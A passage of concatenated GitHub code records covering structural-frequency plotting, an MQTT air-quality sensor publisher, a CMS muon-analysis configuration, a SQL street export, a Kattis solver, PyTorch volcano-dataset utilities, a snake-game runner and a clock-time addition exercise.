& 10')\n\n\t# ~~ model 11\n\tprediction5 = Reg5.model_11_emp(Reg5.input, *(Reg5.pars))\n\tax22.plot(Reg5.database['H'], Reg5.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax22.plot(Reg5.database['H'], prediction4, 'r+', label = 'model 11')\n\n\t# ~~ model 12\n\tprediction6 = Reg6.model_12_emp(Reg6.input, *(Reg6.pars))\n\tax23.plot(Reg6.database['H'], Reg6.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax23.plot(Reg6.database['H'], prediction6, 'r+', label = 'model 12')\n\n\t# ~~ model 13\n\tprediction7 = Reg7.model_13_emp(Reg7.input, *(Reg7.pars))\n\tax31.plot(Reg7.database['H'], Reg7.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec, label = 'Measured ' +r'$f_0$')\n\tax31.plot(Reg7.database['H'], prediction7, 'r+', label = 'Computed ' +r'$f_0$')\n\n\t# ~~ Physics based model\n\tdata = database[(database['H'] != -1) & (database['Heff'] != -1) & (database['breadth'] != -1) & (database['length'] != -1) & (database['max_wall_thickness'] != -1) & (database['f0'] != -1) & (database['density'] != -1) & (database['E'] != -1)]\n\n\tli_H = data['H'][0:-1]\n\tli_f0 = data['f0'][0:-1]\n\tli_mod_pb1 = []\n\tli_mod_pb2 = []\n\tli_mod_pb3 = []\n\tli_mod_pb4 = []\n\tth = 90\n\tfor ii in data.index[0:-1]:\n\t\tprint(\"~~~~~~~~~~~~ Tower # %s ~~~~~~~~~~~\" % str(ii))\n\t\ttower = Formulation(database.iloc[ii]) # Build Empirical formulation object\n\t\tf0_model_pb1 = tower.f0_phy('model_1', theta = th)\n\t\tf0_model_pb2 = tower.f0_phy('model_2', theta = th)\n\t\tf0_model_pb3 = tower.f0_phy('model_3', theta = th)\n\t\tf0_model_pb4 = tower.f0_phy('model_4', theta = th)\n\n\t\t# save data\n\t\tli_mod_pb1.append(f0_model_pb1)\n\t\tli_mod_pb2.append(f0_model_pb2)\n\t\tli_mod_pb3.append(f0_model_pb3)\n\t\tli_mod_pb4.append(f0_model_pb4)\n\n\t# ~~ Compute R2 for empirical model\n\tSST = np.sum((li_f0 - np.mean(li_f0))**2)\n\tSSR_pb1 = np.sum((li_f0 - li_mod_pb1)**2)\n\tSSR_pb2 = np.sum((li_f0 - li_mod_pb2)**2)\n\tSSR_pb3 = np.sum((li_f0 - li_mod_pb3)**2)\n\tSSR_pb4 = np.sum((li_f0 - li_mod_pb4)**2)\n\n\tR2_pb1 = 1 - np.divide(SSR_pb1, SST)\n\tR2_pb2 = 1 - np.divide(SSR_pb2, SST)\n\tR2_pb3 = 1 - np.divide(SSR_pb3, SST)\n\tR2_pb4 = 1 - np.divide(SSR_pb4, SST)\n\n\n\n\t# ~~ axis process ~~\n\tli_R2 = [Reg1.R2, Reg2.R2, Reg3.R2, Reg4.R2, Reg5.R2, Reg6.R2, Reg7.R2, R2_pb1, R2_pb2, R2_pb3, R2_pb4]\n\tli_title = ['Emp. model 1', 'Emp. model 2', 'Emp. model 3', 'Emp. model 4', 'Emp. model 5', 'Emp. model 6', 'Emp. model 7']\n\tfor aa, ax in enumerate([ax11, ax12, ax13, ax21, ax22, ax23, ax31]):\n\t\tax_settings_plot(ax)\n\t\tax.text(90, 6, r'$R^2 = %s$'%np.round(li_R2[aa], 2))\n\t\tax.text(60, 12, li_title[aa], bbox=dict(facecolor='none', edgecolor='black', boxstyle='round'), fontsize = 12)\n\t\n\t\"\"\"for aa, ax in enumerate([ax11, ax12, ax13, ax21, ax22, ax23, ax31]):\n\t\tax.text(90, 6, r'$R^2 = %s$'%np.round(li_R2[aa], 2))\"\"\"\n\n\n\tfor ax in [ax11, ax21, ax31]:\n\t\tax.set_ylabel(r'$f_0\\,[Hz]$')\n\n\tfor ax in [ax22, ax23, ax31]:\n\t\tax.set_xlabel('H [m]')\n\n\n\t# ~~ LEGEND\n\tax31.legend(bbox_to_anchor=(2,0.75), frameon=False)\n\n\t# ~~ PLOT AND SAVE\n\tplt.savefig('Empirical_Relation.png', dpi = 500)\n\n\n\n\n\n\n\t#plt.show()\n\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ PLOT FIGURE FOR EMPIRICAL LAW ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\tfig = plt.figure(2, figsize = (10, 5))\n\tspec = gridspec.GridSpec(figure = fig, ncols=3, nrows=2, top = 0.9, bottom = 0.12, left = 0.1, right = 0.97, wspace = 0.1, hspace = 0.3)\n\n\tax32 = fig.add_subplot(spec[0, 0], sharex = ax22,sharey = ax31)\n\tax33 = fig.add_subplot(spec[0, 1], sharex = ax22,sharey = ax31)\n\tax41 = fig.add_subplot(spec[0, 2], sharex = ax22,sharey = ax31)\n\tax42 = fig.add_subplot(spec[1, 0], sharex = ax22,sharey = ax31)\n\n\n\n\t# ~~ Physics based model 1\n\tax32.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax32.plot(li_H, li_mod_pb1, 'r+')\n\n\t# ~~ Physics based model 2\n\tax33.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax33.plot(li_H, li_mod_pb2, 'r+')\n\n\t# ~~ Physics based model 3\n\tax41.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax41.plot(li_H, li_mod_pb3, 'r+')\n\n\t# ~~ Physics based model 2\n\tax42.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec, label = 'Measured ' +r'$f_0$')\n\tax42.plot(li_H, li_mod_pb4, 'r+', label = 'Computed ' +r'$f_0$')\n\t# ~~ axis process ~~\n\tli_R2 = [R2_pb1, R2_pb2, R2_pb3, R2_pb4]\n\tli_title = ['Phys. based model 1', 'Phys. based model 2', 'Phys. based model 3', 'Phys. based model 4']\n\tfor aa, ax in enumerate([ax32, ax33, ax41, ax42]):\n\t\tax_settings_plot(ax)\n\t\tax.text(90, 6, r'$R^2 = %s$'%np.round(li_R2[aa], 2))\n\t\tif ax in [ax32, ax33, ax41, ax42]:\n\t\t\tax.text(30, 12, li_title[aa], bbox=dict(facecolor='none', edgecolor='black', boxstyle='round'), fontsize = 12)\n\t\telse:\n\t\t\tax.text(60, 12, li_title[aa], bbox=dict(facecolor='none', edgecolor='black', boxstyle='round'), fontsize = 12)\n\t\n\t\"\"\"for aa, ax in enumerate([ax11, ax12, ax13, ax21, ax22, ax23, ax31]):\n\t\tax.text(90, 6, r'$R^2 = %s$'%np.round(li_R2[aa], 2))\"\"\"\n\n\n\tfor ax in [ax32, ax42]:\n\t\tax.set_ylabel(r'$f_0\\,[Hz]$')\n\n\tfor ax in [ax42, ax33, ax41]:\n\t\tax.set_xlabel('H [m]')\n\n\n\t# ~~ LEGEND\n\tax42.legend(bbox_to_anchor=(2,0.75), frameon=False)\n\n\t# ~~ PLOT AND SAVE\n\tplt.savefig('Physics_Based.png', dpi = 500)\n\n\tplt.show()\n\n\n","repo_name":"MArnaud/TURRIS","sub_path":"EmpiricalPhysicsBasedModel.py","file_name":"EmpiricalPhysicsBasedModel.py","file_ext":"py","file_size_in_byte":30470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34744313971","text":"import serial,datetime,time\nimport paho.mqtt.client as mqtt\nfrom time import gmtime,strftime\n\nport = serial.Serial('/dev/ttyS0', baudrate=9600, timeout=1)\n\ndef read_pm_line():\n rv = b''\n while True:\n ch1 = port.read(2)\n #print(\"get 1: {}\".format(ch1))\n if ch1 == b'\\x42\\x4D':\n rv += port.read(30)\n return rv\n### custom action ###\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected code: {}\".format(rc))\n client.subscribe(topic = \"test\")\ndef on_disconnect(client, userdata, rc):\n print(\"Disconnected From Broker\")\n### action appointed ###\nprint(\"creating new instance\")\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\n\nprint(\"connecting to broker\")\nclient.connect(\"140.123.107.170\",1883,60)\ntime.sleep(0.5)\nclient.loop_start()\n\nwhile True:\n try:\n rcv = read_pm_line()\n res = {'timestamp':datetime.datetime.now()}\n res['apm10']=(rcv[2] * 256 + rcv[3])\n res['apm25']=(rcv[4] * 256 + rcv[5])\n res['apm100']=(rcv[6] * 256 + rcv[7])\n res['pm10']=(rcv[8] * 256 + rcv[9])\n res['pm25']=(rcv[10] * 256 + rcv[11])\n res['pm100']=(rcv[12] * 256 + rcv[13])\n res['gt03um']=(rcv[14] * 256 + rcv[15])\n res['gt05um']=(rcv[16] * 256 + rcv[17])\n res['gt10um']=(rcv[18] * 256 + rcv[19])\n res['gt25um']=(rcv[20] * 256 + rcv[21])\n res['gt50um']=(rcv[22] * 256 + rcv[23])\n res['gt100um']=(rcv[24] * 256 + rcv[25])\n print(\"===============\")\n print(\"PM1\\t: {}\".format(res['pm10']))\n print(\"PM2.5\\t: {}\".format(res['pm25']))\n print(\"PM10\\t: {}\".format(res['pm100']))\n print(\">0.3um\\t: {}\".format(res['gt03um']))\n print(\">0.5um\\t: {}\".format(res['gt05um']))\n print(\">1.0um\\t: {}\".format(res['gt10um']))\n print(\">2.5um\\t: {}\".format(res['gt25um']))\n print(\">5.0um\\t: {}\".format(res['gt50um']))\n print(\">10um\\t: {}\".format(res['gt100um']))\n datt = strftime(\"%Y%m%d\")\n timm = strftime(\"%H%M%S\")\n timee = datt + timm\n print(timee)\n msg = \"'EE' {} {} {} {} {} {} {} {} {} {}\".format(res['pm10'],res['pm25'],res['pm100'],res['gt03um'],res['gt05um'],res['gt10um'],res['gt25um'],res['gt50um'],res['gt100um'],timee)\n client.publish(\"sen/aqi\",msg)\n time.sleep(5)\n\n except KeyboardInterrupt:\n client.loop_stop()\n break\n\n","repo_name":"abnormal749/final-project","sub_path":"mq_aqi.py","file_name":"mq_aqi.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34402576284","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"MuonPlots\")\n\n# Messages\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 100\n\nprocess.load(\"Configuration.StandardSequences.Geometry_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.GlobalTag.globaltag = 'GR_R_38X_V14::All'\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n ## Produced with MuonAnalysis/Examples/test/patSkims/patMuons_mc_cfg.py\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_56_1_IBk.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_57_1_uaT.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_58_1_Lqw.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_59_1_s0U.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_5_1_xpk.root',\n ),\n lumisToProcess = cms.untracked.VLuminosityBlockRange(),\n)\n\n\nfrom FWCore.PythonUtilities.LumiList import LumiList\nprocess.source.lumisToProcess = LumiList(filename = 'Cert_136033-149442_7TeV_Nov4ReReco_Collisions10_JSON.txt').getCMSSWString().split(',')\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(20000) )\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\n\nprocess.TFileService = cms.Service('TFileService', fileName=cms.string('inclusiveMuonPlots_Data.root') )\n\ndef addAliases(process, mainlabel):\n mainmodule = getattr(process,mainlabel)\n ## split also in barrel/endcap\n abseta = \"abs(eta)\"\n if mainlabel.find(\"standAlone\") == 0: abseta = \"abs(outerTrack.eta)\";\n mbar = mainmodule.clone(selection = mainmodule.selection.value() + \" && \"+abseta+\" < 1.2\");\n mec = mainmodule.clone(selection = mainmodule.selection.value() + \" && \"+abseta+\" > 1.2\");\n setattr(process, mainlabel+\"B\", mbar);\n setattr(process, mainlabel+\"E\", mec );\n setattr(process, mainlabel+\"_Paths\", cms.Path(mainmodule+mbar+mec))\n\nfrom MuonAnalysis.Examples.inclusiveMuonPlots_cfi import makeInclusiveMuonPlots;\ncommonInputs = cms.PSet(\n muons = cms.InputTag('patMuonsWithTrigger'),\n onlyLeadingMuon = cms.bool(True),\n old36Xdata = cms.bool(False),\n primaryVertices = cms.InputTag(\"offlinePrimaryVertices\"),\n doTrackExtrapolations = cms.bool(False),\n extraPlots = cms.bool(True),\n jets = cms.InputTag(\"ak5PFJets\"),\n met = cms.InputTag(\"pfMet\"),\n)\n\nCSEL=\"pt > 20 && (!triggerObjectMatchesByPath('HLT_Mu9').empty() || !triggerObjectMatchesByPath('HLT_Mu15_v1').empty()) && \"\nprocess.trackerMuons = cms.EDAnalyzer(\"InclusiveMuonPlots\",\n makeInclusiveMuonPlots(ptScale=3),\n commonInputs,\n selection = cms.string(CSEL+\"isTrackerMuon\") # && muonID('TMLastStationAngTight')\"),\n)\naddAliases(process, \"trackerMuons\")\n\nprocess.globalMuons = process.trackerMuons.clone(selection = CSEL+\"isGlobalMuon\")\naddAliases(process, \"globalMuons\")\n\nif False:\n process.standAloneMuons = process.trackerMuons.clone(selection = CSEL+\"isStandAloneMuon\")\n process.standAloneMuonsVH = process.trackerMuons.clone(selection = CSEL+\"isStandAloneMuon && outerTrack.numberOfValidHits > 0\")\n addAliases(process, \"standAloneMuons\")\n addAliases(process, \"standAloneMuonsVH\")\n\n\nprocess.tightMuons = process.globalMuons.clone(\n selection = (CSEL+\n 'muonID(\"GlobalMuonPromptTight\") && numberOfMatches > 1 && '+\n 'track.hitPattern.numberOfValidPixelHits > 0 && track.hitPattern.numberOfValidTrackerHits > 10 && '+\n 'abs(dB) < 0.2')\n)\naddAliases(process, \"tightMuons\")\n\nprocess.tightIsoMuons = process.globalMuons.clone(\n selection = (CSEL+\n 'muonID(\"GlobalMuonPromptTight\") && numberOfMatches > 1 && '+\n 'track.hitPattern.numberOfValidPixelHits > 0 && track.hitPattern.numberOfValidTrackerHits > 10 && '+\n 'abs(dB) < 0.2 &&'+\n '(isolationR03.emEt + isolationR03.hadEt + isolationR03.sumPt)/pt < 0.1' )\n)\naddAliases(process, \"tightIsoMuons\")\n\nprocess.tightBMuons = process.globalMuons.clone(\n selection = (CSEL+\n 'muonID(\"GlobalMuonPromptTight\") && numberOfMatches > 1 && '+\n 'track.hitPattern.numberOfValidPixelHits > 0 && track.hitPattern.numberOfValidTrackerHits > 10 && '+\n 'abs(dB) < 0.5 && abs(dB/edB) > 3.5' )\n)\naddAliases(process, \"tightBMuons\")\n\n\n\n","repo_name":"ahlinist/cmssw","sub_path":"MuonAnalysis/Examples/test/inclusiveMuonPlots/inclusiveMuonPlots_Data_highPt_cfg.py","file_name":"inclusiveMuonPlots_Data_highPt_cfg.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22948680030","text":"#! c:\\python3\\python.exe \n# coding: utf-8\n\"\"\"\nk_show_streets @is_json=:is_json1\n\"\"\"\n\nimport json\nimport my_sql_func\nimport socket\nimport logging.config\nimport logging_yaml\n\nlogging_yaml.setup_logging()\n# logging.config.fileConfig('logging.ini', disable_existing_loggers=False)\nlogger = logging.getLogger(__name__)\n\nconnect_file = 'config.ini'\nsection = 'my_connect' if socket.gethostname().lower() == 'adm' else 'mfc_connect' # my_connect mfc_connect\n# section = 'mfc_connect'\ntry:\n conn = my_sql_func.create_connection(connect_file, section)\nexcept Exception as ex:\n logger.exception(\"exception message\", ex)\n raise\n\ncursor = conn.cursor()\ntry:\n cursor.execute(\"exec k_show_streets \")\nexcept Exception as ex:\n logger.exception(\"exception message\", ex)\n raise\nrows = cursor.fetchall()\ncols = [i[0] for i in cursor.description]\n\ndata = {\"dataStreets\": []}\nfor item in rows:\n data[\"dataStreets\"].append(dict(zip(cols, item)))\n\nlogger.info(\"streets have been unloaded. rowcount: \" + str(len(rows)))\ncursor.close()\nconn.close()\n# =====================================================\nprint(\"Content-type: application/json; charset=utf-8 \\n\")\nprint(json.dumps(data, ensure_ascii=False))\n# print(json.dumps(data, indent=4, ensure_ascii=False))\n# =====================================================\n","repo_name":"mpuzanov/Bill18Py","sub_path":"show_streets.py","file_name":"show_streets.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"23840875104","text":"import sys\nfrom functools import lru_cache\nsys.setrecursionlimit(2000000)\n\ndef read_input():\n return sys.stdin.readline().replace('\\n','')\n\ndef input_to_int_tuple(separator=' '):\n return tuple(map(int, read_input().split(separator)))\n\nboard_x, board_y = input_to_int_tuple()\n\nboard = []\nfor x in range(board_x):\n board.append(list(map(int, list(read_input()))))\n\n\n# Deleting identical rows\nskip = False\ndeleted = []\nfor row in range(board_x-1):\n if skip:\n skip = False\n continue\n\n if board[row] == board[row+1]:\n board.pop(row+1)\n deleted.append(row+1)\n skip = True\n\nboard_x = board_x - len(deleted)\n\nnumber_of_moves = int(read_input())\nmoves = []\nfor n in range(number_of_moves):\n x1, y1, x2, y2 = input_to_int_tuple()\n \n # Changing x's if rows were deleted\n for row_index in deleted:\n if x1 >= row_index:\n x1 -= 1\n if x2 >= row_index:\n x2 -= - 1\n\n moves.append(((x1-1, y1-1), (x2-1, y2-1)))\n\n\ndef get_type_of_person(x, y):\n if board[x][y]:\n return 'decimal', 1\n return 'binary', 0\n\ndef get_board_value(x, y):\n if x < 0 or y < 0 or x >= board_x or y >= board_y:\n return\n return board[x][y]\n\nzones = {\n 0: [],\n 1: [],\n}\n\ndef build_zones():\n visited = set()\n\n for row in range(board_x):\n for column in range(board_y):\n if (row, column) in visited:\n continue\n else:\n zone = set()\n\n @lru_cache(maxsize=None)\n def walk(x, y, group_type):\n if (x, y) in visited or get_board_value(x, y) != group_type:\n return\n visited.add((x, y))\n\n zone.add((x, y))\n\n directions = [\n (x, y-1),\n (x, y+1),\n (x-1, y),\n (x+1, y),\n ]\n\n for direction in directions:\n walk(direction[0], direction[1], group_type)\n\n walk(row, column, get_board_value(row, column))\n\n zones[get_board_value(row, column)].append(zone)\n\nbuild_zones()\n\ndef check_move(move):\n x1, y1 = move[0] # Start\n x2, y2 = move[1] # Finish\n\n person, repr_person = get_type_of_person(x1, y1)\n\n for zone in zones[repr_person]:\n if (x1, y1) in zone and (x2, y2) in zone:\n return person\n return 'neither'\n\nfor move in moves:\n print(check_move(move))\n","repo_name":"pawelpel/open-kattis","sub_path":"problems playground/10KindsOfPeople_2_s.py","file_name":"10KindsOfPeople_2_s.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6922830097","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 29 21:03:40 2018\n\n@author: stephanecaron\n\"\"\"\n\n###############################################################################\n# Apprentissage et reconnaissance\n# GIF-4101 / GIF-7005, Automne 2018\n# Devoir 4, Code utilitaire\n#\n###############################################################################\n\nimport gzip\nimport random\n\nimport numpy as np\n\nfrom sklearn.metrics import confusion_matrix\n\nimport torch\nimport torch.nn as nn\n\n\nCODES_DE_SECTION = {\n 'BACC': 4101,\n 'GRAD': 7005\n}\n\n\nclass VolcanoesDataset:\n \"\"\"\n Cette classe sert à définir le dataset Volcanoes pour PyTorch\n dataset venant de Francisco Mena sur kaggle : https://bit.ly/2DasPF1\n\n Args:\n path (str): le chemin du fichier .pt du dataset\n \"\"\"\n\n def __init__(self, path):\n # garde les paramètres en mémoire\n self.path = path\n\n # charger les données\n with gzip.open(path, 'rb') as f:\n self.data = torch.load(f)\n self.targets = np.array(list(zip(*self.data))[1])\n\n def __getitem__(self, index):\n return self.data[index]\n\n\nclass VolcanoesLoader:\n \"\"\"\n Cette classe sert à charger le dataset Volcanoes pour PyTorch\n lors de l'entraînement en équilibrant le dataset\n\n Args:\n dataset (VolcanoesDataset): le dataset à utiliser\n batch_size (int): la taille de la batch à utiliser\n \"\"\"\n\n def __init__(self, dataset, batch_size, balanced=True, random_seed=42):\n # Garde les paramètres en mémoire\n self.dataset = dataset\n self.batch_size = batch_size\n self.balanced = balanced\n\n # Calcul les indices et la tailles des exemples positifs\n # et négatif. Comme ça, on peut rebalancer le dataset\n self.pos_idx = np.where(self.dataset.targets == 1)[0].tolist()\n self.neg_idx = np.where(self.dataset.targets == 0)[0].tolist()\n self.pos_size = len(self.pos_idx)\n self.neg_size = len(self.neg_idx)\n\n # Définit la random seed\n self.random = random.Random(random_seed)\n\n def __next__(self):\n # Vérifie si l'epoch est finie\n if self.i_batch == self.nb_batch:\n raise StopIteration\n\n # Calcul les indices de la batch\n start = self.i_batch * self.batch_size\n end = start + self.batch_size\n idx = self.indices[start:end]\n\n # Sélectionne la batch\n X, y = [], []\n for i in idx:\n X.append(self.dataset.data[i][0])\n y.append(self.dataset.data[i][1])\n\n # Convertit les listes en TorchTensor\n X = torch.stack(X)\n y = torch.stack(y).float().view(-1, 1)\n\n # Incrémente le compteur\n self.i_batch += 1\n\n return X, y\n\n def __iter__(self):\n # Choisi la bonne méthode\n if self.balanced:\n # Échantillonne un nombre d'exemples négatifs pour l'epoch\n neg_sample = self.random.sample(self.neg_idx, k=self.pos_size)\n\n # Crée l'ensemble d'indices pour l'epoch\n self.indices = self.pos_idx + neg_sample\n self.random.shuffle(self.indices)\n else:\n self.indices = list(range(len(self.dataset.data)))\n self.random.shuffle(self.indices)\n\n # Calcul le nombre de batch et débute le compteur\n self.nb_batch = len(self.indices) // self.batch_size\n self.i_batch = 0\n\n return self\n\n\nclass VolcanoesConv(nn.Module):\n \"\"\"\n Cette classe sert à définir la convolution\n utilisée dans le cadre du réseau VolcanoesNet\n \"\"\"\n\n def __init__(self, ch_in, ch_out, kernel):\n super().__init__()\n padding = kernel // 2\n self.model = nn.Conv2d(ch_in, ch_out, \\\n kernel, stride=2, padding=padding)\n\n def forward(self, x):\n return self.model(x)\n\n\ndef compute_accuracy(model, dataloader, device='cpu'):\n training_before = model.training\n model.eval()\n\n all_predictions = []\n all_targets = []\n for i_batch, batch in enumerate(dataloader):\n images, targets = batch\n\n images = images.to(device)\n targets = targets.to(device)\n\n with torch.no_grad():\n predictions = model(images)\n\n all_predictions.append(predictions.cpu().numpy())\n all_targets.append(targets.cpu().numpy())\n\n if all_predictions[0].shape[-1] > 1:\n predictions_numpy = np.concatenate(all_predictions, axis=0)\n predictions_numpy = predictions_numpy.argmax(axis=1)\n targets_numpy = np.concatenate(all_targets, axis=0)\n else:\n predictions_numpy = np.ravel(all_predictions)\n targets_numpy = np.ravel(all_targets)\n predictions_numpy[predictions_numpy >= 0.5] = 1.0\n predictions_numpy[predictions_numpy < 0.5] = 0.0\n\n if training_before:\n model.train()\n\n return (predictions_numpy == targets_numpy).mean()\n\n\ndef compute_confusion_matrix(model, dataloader, device='cpu'):\n training_before = model.training\n model.eval()\n\n all_predictions = []\n all_targets = []\n dataloader.balanced = False\n for i_batch, batch in enumerate(dataloader):\n images, targets = batch\n\n images = images.to(device)\n targets = targets.to(device)\n\n with torch.no_grad():\n predictions = model(images)\n\n all_predictions.append(predictions.cpu().numpy())\n all_targets.append(targets.cpu().numpy())\n dataloader.balanced = True\n\n predictions_numpy = np.ravel(all_predictions)\n targets_numpy = np.ravel(all_targets)\n\n predictions_numpy[predictions_numpy >= 0.5] = 1.0\n predictions_numpy[predictions_numpy < 0.5] = 0.0\n\n if training_before:\n model.train()\n\n matrix = confusion_matrix(targets_numpy, predictions_numpy)\n matrix = matrix / matrix.sum(axis=1)[:, np.newaxis]\n\n return matrix","repo_name":"stecaron/gif-7005-devoirs","sub_path":"devoir-4/d4utils.py","file_name":"d4utils.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"24923398268","text":"import random\nimport sys\nfrom argparse import ArgumentParser\nfrom math import isinf\nfrom time import sleep\n\nimport numpy as np\nimport pandas as pd\n\nfrom snakes.bots import bots\nfrom snakes.elo import print_tournament_summary\nfrom snakes.game import Game, RoundType, deserialize, print_event\nfrom snakes.utils import levenshtein_ratio, Printer\n\n\ndef main(snake1, snake2, rate, seed, start):\n names = [Bot(id=i, grid_size=(1, 1)).name for i, Bot in enumerate(bots)]\n\n name_matches = [levenshtein_ratio(name, snake1) for name in names]\n agent1 = np.argmax(name_matches)\n\n name_matches = [levenshtein_ratio(name, snake2) for name in names]\n agent2 = np.argmax(name_matches)\n\n # One agent could be up against itself, so we'll need to give new ids\n agents = {0: bots[agent1], 1: bots[agent2]}\n\n if seed is None:\n seed = random.randrange(sys.maxsize)\n random.seed(seed)\n\n game = Game(agents=agents, round_type=RoundType.TURNS)\n\n if start:\n grid_size, candies, turn, snakes = deserialize(start)\n game.state.grid_size = grid_size\n game.state.candies = candies\n game.state.turn = turn\n game.state.snakes = snakes\n\n printer = Printer()\n printer.print(game)\n while True:\n for event in game.update():\n agent_names = {id: agent.name for id, agent in game.agents.items()}\n print_event(event, agent_names)\n printer.print(game)\n if not isinf(rate):\n sleep(1 / rate)\n\n if game.finished():\n break\n\n print(f'For a replay of this game run the following command:\\n./commandline.py {snake1!r} {snake2!r} --seed {seed}')\n print()\n row = {game.agents[id].name: rank for id, rank in game.rank().items()}\n row['turns'] = game.turns\n row['seed'] = seed\n row.update({'cpu_' + game.agents[i].name: cpu for i, cpu in game.cpu.items()})\n df = pd.DataFrame([row])\n print_tournament_summary(df, elo=False)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='Battle two snakes in the command line')\n parser.add_argument('snake1', help=\"Name of snake 1\")\n parser.add_argument('snake2', help=\"Name of snake 2\")\n parser.add_argument('-r', '--rate', default=float('inf'), type=float, help=\"Playback rate (Hz)\")\n parser.add_argument('-s', '--seed', type=int, help='Random seed')\n parser.add_argument('--start', help='Start from game state')\n args = parser.parse_args()\n\n try:\n main(**vars(args))\n except KeyboardInterrupt:\n pass\n","repo_name":"nobleans-playground/coding-challenge-snakes","sub_path":"commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"17593460392","text":"def add_time(start, duration, *day):\n # print(start, duration)\n new_time = ''\n\n # Start arg breakdown\n start_time = start.split()\n start_hhmm = start_time[0].split(':')\n start_hh = int(start_hhmm[0])\n start_mm = int(start_hhmm[1])\n meridian = [start_time[1]]\n if meridian[0] == 'AM':\n meridian.append('PM')\n elif meridian[0] == 'PM':\n meridian.append('AM')\n\n # Duration arg breakdown\n add_hhmm = duration.split(':')\n add_hh = int(add_hhmm[0])\n add_mm = int(add_hhmm[1])\n\n # Optional day arg\n week_day = ''\n if day:\n week_day = day[0].title()\n\n # Calculations\n start_minutes = (start_hh * 60) + start_mm\n add_minutes = (add_hh * 60) + add_mm\n days_count = int(add_minutes / 1440)\n result_minutes = start_minutes + add_minutes\n\n result_hh = int(result_minutes / 60)\n result_mm = result_minutes % 60\n\n # Output builder\n meridian_index = int(int(result_hh / 12) % 2)\n final_mm = str(result_mm)\n\n if len(final_mm) < 2:\n final_mm = '0' + final_mm\n\n while result_hh > 12:\n result_hh -= 12\n\n final_meridian = meridian[meridian_index]\n final_hh = str(result_hh)\n\n final_days = ''\n week_day_count = 0\n\n if meridian[0] == 'PM' and final_meridian == 'AM':\n if days_count < 1:\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count >= 1:\n final_days = final_days + f'({days_count + 1} days later)'\n week_day_count += days_count + 1\n elif meridian[0] == 'AM' and final_meridian == 'AM':\n if days_count == 1 or (days_count < 1 and add_minutes > 720):\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count > 1:\n final_days = final_days + f'({days_count} days later)'\n week_day_count += days_count\n elif meridian[0] == 'PM' and final_meridian == 'PM':\n if days_count == 1 or (days_count < 1 and add_minutes > 720):\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count > 1:\n final_days = final_days + f'({days_count} days later)'\n week_day_count += days_count\n elif meridian[0] == 'AM' and final_meridian == 'PM':\n if days_count < 1 and add_minutes > 720:\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count >= 1:\n final_days = final_days + f'({days_count + 1} days later)'\n week_day_count += days_count + 1\n\n week = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\n\n if week_day:\n day_index = week.index(week_day)\n rotated_week = week[day_index:] + week[:day_index]\n week_day = rotated_week[week_day_count % 7]\n\n # Return constructor\n new_time = new_time + final_hh + ':' + final_mm + ' ' + final_meridian\n\n if week_day and final_days:\n new_time = new_time + ', ' + week_day + ' ' + final_days\n elif final_days:\n new_time = new_time + ' ' + final_days\n elif week_day:\n new_time = new_time + ', ' + week_day\n\n return 